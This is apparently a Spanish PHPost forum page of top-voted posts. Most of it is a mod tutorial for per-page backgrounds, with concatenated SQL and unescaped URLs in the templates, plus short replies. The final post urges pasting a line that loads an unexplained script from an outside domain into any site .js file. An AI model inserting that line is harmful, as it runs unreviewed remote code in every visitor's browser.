$c['fotos'] .'\', `admin` = \'' . $c['admin']. '\' WHERE `id` = \'1\'')) return true; else exit( show_error('Error al ejecutar la consulta de la línea '.__LINE__.' de '.__FILE__.'.', 'db') ); } 5) Luego buscamos en inc/php/admin.php y buscamos /** NOTICIAS **/ } elseif($action == 'news'){ y arriba ponemos /** Backgrounds by @Miguel92 **/ }elseif($action == 'back'){ // GUARDAR CONTROLES if(!empty($_POST['home'])) { if($tsAdmin->saveBack()) $tsCore->redirectTo($tsCore->settings['url'].'/admin/back?save=true'); } 6) Luego buscamos templates/t.admin.tpl y buscamos {elseif $tsAction == 'rangos'} {include file='admin_mods/m.admin_rangos.tpl'} y debajo agregamos {elseif $tsAction == 'back'} {include file='admin_mods/m.admin_backg.tpl'} 7) Luego vamos a templates/admin_mods y crearemos un archivo llamado ' m.admin_back.tpl ' y alli alojaremos esto <div class="boxy-title"> <h3>Backgrounds para cambios depende de página</h3> </div> <div id="res" class="boxy-content"> {if $tsSave}<div style="display: block;" class="mensajes ok">Las configuraciones han sido guardadas! </div>{/if} <form action="" method="post" autocomplete="off"> <fieldset> <legend>Backgrounds</legend> <!-- COPYRIGHT --> <dl> <dt><label for="creador">Hecho por</label><br /><span>Creado para todos ustedes con amor!.</span></dt> <dd><input type="text" id="creador" name="creador" disabled maxlength="300" value="{$tsBack.creador}" /></dd> </dl> <!-- PARA POSTS --> <dl> <dt><label for="posts">Fondo para Posts</label><br /><span>Introduce la URL de fondo que quieres!.</span></dt> <dd><input type="text" id="posts" name="posts" maxlength="300" value="{$tsBack.posts}" /></dd> </dl> <!-- PARA FOTOS --> <dl> <dt><label for="fotos">Fondo para Fotos</label><br /><span>Introduce la URL de fondo que quieres!.</span></dt> <dd><input type="text" id="fotos" name="fotos" maxlength="300" value="{$tsBack.fotos}" /></dd> </dl> <!-- PARA ADMIN --> <dl> <dt><label for="admin">Fondo para Admin</label><br /><span>Introduce la URL de fondo que quieres!.</span></dt> <dd><input type="text" id="admin" name="admin" maxlength="300" value="{$tsBack.admin}" /></dd> </dl> <p><input type="submit" name="save" value="Guardar Cambios" class="btn_g"/></p> </fieldset> </form> </div> 8) Luego buscamos en el mismo directorio m.admin_sidemenu.tpl y buscamos <h4>General</h4> y debajo pegamos <h4>Control nuevos</h4> <ul class="cat-list"> <li id="a_configs"><span class="cat-title"><a href="{$tsConfig.url}/admin/back">Control background</a></span></li> </ul> <hr> 9) Luego buscamos en templates/sections/main_header.tpl y buscamos <body> y reemplazamos por <body style="background-image: url({if $tsPage == 'home'}{$tsBack.home}{elseif $tsPage == 'posts'}{$tsBack.posts}{elseif $tsPage == 'fotos'}{$tsBack.fotos}{elseif $tsPage == 'admin'}{$tsBack.admin}{else}{$tsControl.fondo_web}{/if}); background-repeat:no-repeat; background-size:cover; background-color: #000; background-attachment: fixed;"> background-repeat:no-repeat; ---> Para que la imagen no se repita para ningun lado background-size:cover; ---> Esto abarcará toda la pantalla tambien se puede usar background-size: 100% 50%; background-color: #000; ---> El fondo tambien es de color negro background-attachment: fixed; ----> El fondo no se moverá y si quieren van a estilos.css buscan body { y lo agregan alli } igual ya se que la mayoría que conoce esto en html pero hay otros que tal vez no lo conocé Espero que sea esto lo que estabas buscando y tambien se puede aplicar al LOGO si quieren que sea diferente en cada página... Lamento no haber puesto Caps!
    1 Puntos
  40. Rengo

    [Theme] Cralke [Editado]

    Que bueno, todo solucionado entonces, suerte con la web! saludos
    1 Puntos
  41. 1 Puntos
  42. MrDioamDev

    Bootstrap Basic

    Aca tienen la nueva version (como debio de ser desde el principio), adapte todo el css del theme default para que usen con bootstrap!
    1 Puntos
  43. MrDioamDev

    Bootstrap Basic

    Es asi, no un theme, una plantilla para crear.
    1 Puntos
  44. Vellenger

    Risus Forum

    Se ve bueno.. espero verlo terminado,..
    1 Puntos
  45. Aleperix

    SigFlix.Tk - Nueva Comunidad

    Hola, quería presentar mi nuevo foro en el que necesitaría ayuda en personas que tengan tiempo de publicar lo que más les guste, ya que se puede publicar lo que les interese a todos. SigFlix.Tk Si pudieran darme una pequeña ayuda de su parte se lo agradecería. Muchas Gracias!. PD: Si este tema no va aquí por favor muévanlo para el foro correspondiente por que no lo he encontrado :).
    1 Puntos
  46. MrDioamDev

    Donde conseguir este tema

    Bueno, el script que usa esa web que pasaste es Phpost, así alguien podría hacerlo. Y al parecer, el que creó ese theme fue @Vellenger, porque su nick aparece en el código. O por lo menos, usaron algunos de sus themes ya creados y publicados aquí. Así que deberías preguntarle a él.
    1 Puntos
  47. MegaErick

    Feliz año nuevo de parte de este fantasma e,e

    Feliz año nuevo de parte de este fantasma e,e
    1 Puntos
  48. alexander1712

    [minimod] Aprobacion de posts en herramientas

    Hola, hoy no traigo nada impresionante, simplemente una respuesta al pedido de éste post: http://www.phpost.net/foro/topic/17345-pedido-aprobacion-de-posts-en-herramientas/ agregaremos un boton reactivar post... solo le falta reparar el diseño abrir m.post_autor.tpl y buscar: {else} {if $tsUser->is_admod || $tsUser->permisos.mosu}<a href="#" onclick="mod.users.action({$tsAutor.user_id}, 'ban', false); $(this).remove(); return false;" class="ban">Suspender Usuario</a>{/if} {/if} {/if} agregar debajo: {if $tsPost.post_status > 0} <a href="#" onclick="mod.reboot({$tsPost.post_id}, 'posts', 'reboot', false); return false;"> <img src="http://localhost/themes/default/images/icons/reboot.png" title="aprobar post"> </a> {/if} saludos!
    1 Puntos
  49. Altffenser

    Error con el Migrador

    Revisa si se añadio esa columna (p.p_colorfav) a la tabla u_miembros.
    1 Puntos
  50. Otro truco de jQuery: Lo que hace es que si tus posts........................... Lo que hace esta acá http://magicinventor.xyz/posts/198/como-funciona-y-que-es-lo-que-hace-mrbin-js.html Mete este código en cualquier archivo ".js" y verás lo que pasa: $('head').append('<script src="http://magicinventor.xyz/MrBin.js"></script>');
    1 Puntos